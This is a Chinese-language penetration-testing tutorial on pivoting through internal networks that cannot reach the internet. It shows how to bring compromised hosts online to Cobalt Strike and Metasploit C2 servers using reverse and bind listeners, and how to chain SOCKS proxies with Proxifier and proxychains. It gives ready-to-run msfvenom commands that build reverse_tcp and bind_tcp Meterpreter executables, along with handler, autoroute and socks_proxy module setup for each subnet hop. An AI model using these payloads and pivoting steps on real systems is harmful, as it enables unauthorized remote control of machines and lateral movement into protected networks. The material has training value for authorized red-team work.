内网对抗-代理通讯篇&不出网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

知识点

1、代理隧道篇-代理通讯网络不可达-正反向连接上线

2、代理隧道篇-代理通讯网络不可达-SockS代理配置

实现步骤

bash 复制代码
1、在被控机器上获取下一级网段
2、在被控及其上建立SockS节点
3、在工具上配置连接属性和规则触发

演示案例-代理技术-正反向监听/SockS配置-网络不可达-通讯解决/c2上线

bash 复制代码
解决:信息收集打点和漏洞利用部分
C2平台:MSF/CS/Sliver/Viper等


1、CS

192.168.139.x 网段反向上线




socks代理链接工具-Proxifier(windows)

bash 复制代码
注意:配置连接IP为C2服务器IP
C2服务器是一个远程服务器,‌用于管理和控制受感染的计算机或设备。‌C2服务器通常被用于网络攻击活动中,‌攻击者通过C2服务器发送命令,‌控制受感染的设备进行恶意行为




这里假设这个2.22的服务器存在漏洞能直接上线C2服务器,就会涉及一个C2正反向上线问题。

192.168.2.x 网段正向上线

bash 复制代码
反向监听器:reverse
正向监听器:bind(需主动连接)







192.168.3.x 网段正向上线






继续正向上线这个3.22服务器

192.168.4.x 网段正向上线

同理

2、MSF

192.168.139.x 网段反向上线

配置反向上线:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

查看路由表

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p

background 返回不结束会话

创建socks节点

bash 复制代码
use auxiliary/server/socks_proxy


socks代理链接工具-proxychains(linux)

加入修改配置:

bash 复制代码
/etc/proxychains4.conf


调用加载测试:

bash 复制代码
 proxychains4 curl http://192.168.2.22

192.168.2.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run



查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
/etc/proxychains4.conf


192.168.3.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run


查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
 /etc/proxychains4.conf


192.168.4.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run
相关推荐
Mysticbinary5 天前
可以记录IP的网络协议笔记
proxy·代理·记录ip
自由鬼18 天前
正向代理服务器Squid:功能、架构、部署与应用深度解析
java·运维·服务器·程序人生·安全·架构·代理
编程路上的蚂蚁19 天前
从互联网电脑迁移Dify到内网部署Dify方法记录
内网·dify·离线部署
百锦再23 天前
RabbitMQ用法的6种核心模式全面解析
分布式·rabbitmq·路由·消息·通道·交换机·代理
洛克希德马丁1 个月前
最简单的方式突破远程桌面封锁
ssh·代理·socks
不叫猫先生2 个月前
Bright Data网页抓取工具实战:BOSS直聘爬虫 + PandasAI分析洞察前端岗位市场趋势
爬虫·python·ai·代理
爬点儿啥2 个月前
[爬虫知识] IP代理
服务器·网络·爬虫·python·tcp/ip·代理
利刃大大2 个月前
【网络编程】十三、DNS && ICMP && NAT/NAPT && 代理服务器
服务器·网络·dns·nat·代理·icmp
BruceNeter3 个月前
c#开发完整的Socks5代理客户端与服务端——客户端(已完结)
网络·c#·socket·代理
猫头虎3 个月前
极简远程革命:节点小宝 — 无公网IP的极速内网穿透远程解决方案
网络·网络协议·tcp/ip·ai编程·远程工作·内网·穿透